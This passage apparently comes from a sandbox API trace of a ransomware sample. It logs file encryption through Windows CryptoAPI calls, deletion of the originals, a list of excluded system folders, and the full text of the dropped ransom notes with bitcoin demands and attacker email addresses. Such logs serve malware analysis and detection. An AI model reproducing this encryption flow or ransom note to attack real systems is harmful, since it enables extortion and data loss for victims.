dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0163.303] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0163.304] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0163.304] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0163.312] ReadFile (in: hFile=0x39c, lpBuffer=0x290a020, nNumberOfBytesToRead=0xd81d4, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0x290a020*, lpNumberOfBytesRead=0x189930*=0xd81d4, lpOverlapped=0x0) returned 1
	[0163.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.440] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb770) returned 1
	[0163.442] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.442] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0163.442] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.443] CryptHashData (hHash=0xfb91f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0163.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.443] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb91f0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9270) returned 1
	[0163.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.443] CryptEncrypt (in: hKey=0xfb9270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0xd81d4, dwBufLen=0xd81d4 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0xd81e0) returned 1
	[0163.452] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.452] RtlMoveMemory (in: Destination=0x29fd020, Source=0x290a020, Length=0xd81d4 | out: Destination=0x29fd020) 
	[0163.647] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.647] CryptEncrypt (in: hKey=0xfb9270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29fd020*, pdwDataLen=0x1894dc*=0xd81d4, dwBufLen=0xd81e0 | out: pbData=0x29fd020*, pdwDataLen=0x1894dc*=0xd81e0) returned 1
	[0163.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.671] CryptDestroyKey (hKey=0xfb9270) returned 1
	[0163.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.697] CryptDestroyHash (hHash=0xfb91f0) returned 1
	[0163.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.698] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0163.698] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.698] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0163.699] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.699] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0163.700] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 152
	[0163.700] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0163.701] WriteFile (in: hFile=0x3a0, lpBuffer=0x29fd020*, nNumberOfBytesToWrite=0xd81e0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x29fd020*, lpNumberOfBytesWritten=0x189938*=0xd81e0, lpOverlapped=0x0) returned 1
	[0163.760] CloseHandle (hObject=0x3a0) returned 1
	[0163.966] CloseHandle (hObject=0x39c) returned 1
	[0163.966] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat")) returned 1
	[0164.028] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\stream.x86.en-us.man.dat")) returned 0
	[0164.029] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5924f73, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5924f73, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0
	[0164.029] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0164.029] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0164.030] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16"
	[0164.030] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*"
	[0164.030] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0164.030] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0164.030] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0164.030] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0164.031] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0164.031] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0164.035] CloseHandle (hObject=0x390) returned 1
	[0164.037] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0164.037] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.037] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0164.039] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0164.039] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0164.039] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0164.039] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0164.040] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0164.040] CloseHandle (hObject=0x390) returned 1
	[0164.040] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0164.041] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0164.041] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0164.041] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0164.041] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0164.042] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0164.042] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0164.045] CloseHandle (hObject=0x390) returned 1
	[0164.046] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0164.046] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0164.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.047] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0164.048] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0164.049] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0164.049] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0164.049] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0164.049] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0164.049] CloseHandle (hObject=0x390) returned 1
	[0164.051] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5911742, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0x7b4294bb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7b4e7e3d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0164.051] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*") returned 89
	[0164.051] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0164.051] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\en-us.16\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*") returned 0x59
	[0164.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="windows") returned 0x0
	[0164.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="boot") returned 0x0
	[0164.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="system volume information") returned 0x0
	[0164.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0164.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="temp") returned 0x0
	[0164.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="program files") returned 0x0
	[0164.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.053] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0164.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="appdata") returned 0x0
	[0164.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="application data") returned 0x0
	[0164.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="winnt") returned 0x0
	[0164.054] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.054] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="tmp") returned 0x0
	[0164.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="cache") returned 0x0
	[0164.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0164.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.055] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="webcache") returned 0x0
	[0164.055] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="inetcache") returned 0x0
	[0164.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="nvidia") returned 0x0
	[0164.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="packages") returned 0x0
	[0164.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.056] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="cookies") returned 0x0
	[0164.056] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.057] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\en-us.16\\*.*", lpSrch="programdata") returned 0x0
	[0164.057] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0164.057] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0164.057] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5911742, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0x7b4294bb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7b4e7e3d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0164.057] lstrcmpW (lpString1="..", lpString2="..") returned 0
